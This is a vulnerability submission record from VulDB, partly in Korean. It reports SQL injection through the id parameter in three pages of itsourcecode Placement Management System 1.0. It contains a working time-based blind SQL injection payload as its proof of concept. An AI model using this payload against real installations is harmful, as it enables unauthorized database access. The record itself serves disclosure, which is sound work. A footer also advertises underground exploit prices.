제출 #383865: itsourcecode Placement Management System 1.0 SQLi정보

제목itsourcecode Placement Management System 1.0 SQLi
설명In the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
원천⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
사용자
 Dee.Mirage (UID 71702)
제출2024. 07. 31. PM 04:22 (2 연령 ago)
모더레이션2024. 08. 03. AM 08:49 (3 days later)
상태수락
VulDB 항목273543 [itsourcecode Placement Management System 1.0 view_company.php 아이디 SQL 주입]
포인트들20

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!